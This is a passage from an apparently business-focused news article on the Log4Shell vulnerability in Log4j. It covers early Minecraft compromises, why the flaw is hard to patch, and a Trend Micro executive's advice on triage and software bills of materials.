News of the exploit, soon called Log4Shell, quickly spread. Early reports emerged of servers running the game Minecraft being compromised. It quickly became clear, however, that the exploit was widespread and that it would affect many more popular applications and technology tools beyond games.
“We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” Easterly said of the flaw.
Why Are These Vulnerabilities Harmful for Businesses?
Part of the challenge of Log4j is that it is a fundamental design flaw with the tool that interprets code as it’s being logged. This feature makes it easy for remote attackers to target a particular server and access portions of the code without authentication. For example, those who attacked affected Minecraft servers were able to execute rogue code through the game’s chat function alone.
Combine this with the wide number of devices that have utilized Log4j over the years, some of which may be connected devices that haven’t been actively maintained, and you suddenly have a widespread problem.
While a series of patches have since been released by the Apache Software Foundation — it took more than one patch to effectively stop the exploit — many applications of this logging software may prove challenging to update as a result.
William Malik, vice president of infrastructure strategies at Trend Micro, says that this incident reinforces the need to triage such situations to minimize the impact of the problem.
“Obviously, if it’s broken and you’re being exploited, then you do one of three things: You turn off logging; you apply whatever patch is available as quickly as possible; or you back things up and keep rolling with as much instrumentation and observation as possible, so you know what steps you took once you discovered there was a problem.”
More broadly, he says, a more fundamental approach needs to be considered.
How Can Businesses Protect Themselves Against More Vulnerabilities?
There are two important strategies to keep in mind when attempting to manage software exploits. One involves getting a better accounting of what technologies are in your infrastructure.
The increased use of open-source software, including Log4j but not limited to it, has underscored the need for a software bill of materials — an ingredient list for what’s in your infrastructure. CISA and other federal agencies have made a push to see these broadly implemented in the wake of Log4Shell and the recent wave of supply chain attacks.
Malik notes this is an important concept worth striving for, but says it is not an easy thing to implement on its own.
“You’ve got to know what you’re cooking with,” he says. “And the biggest challenge is to get that up to date and reoccurring, which is hard. I’m not throwing a rocket at anybody who hasn’t got this thing nailed down, because very few do — it’s a hard problem.”
The second strategy, while more complicated to implement, could help mitigate problems from wide-reaching exploits. This involves building a security framework that can minimize fires such as the zero-day incident that followed the Log4Shell revelations.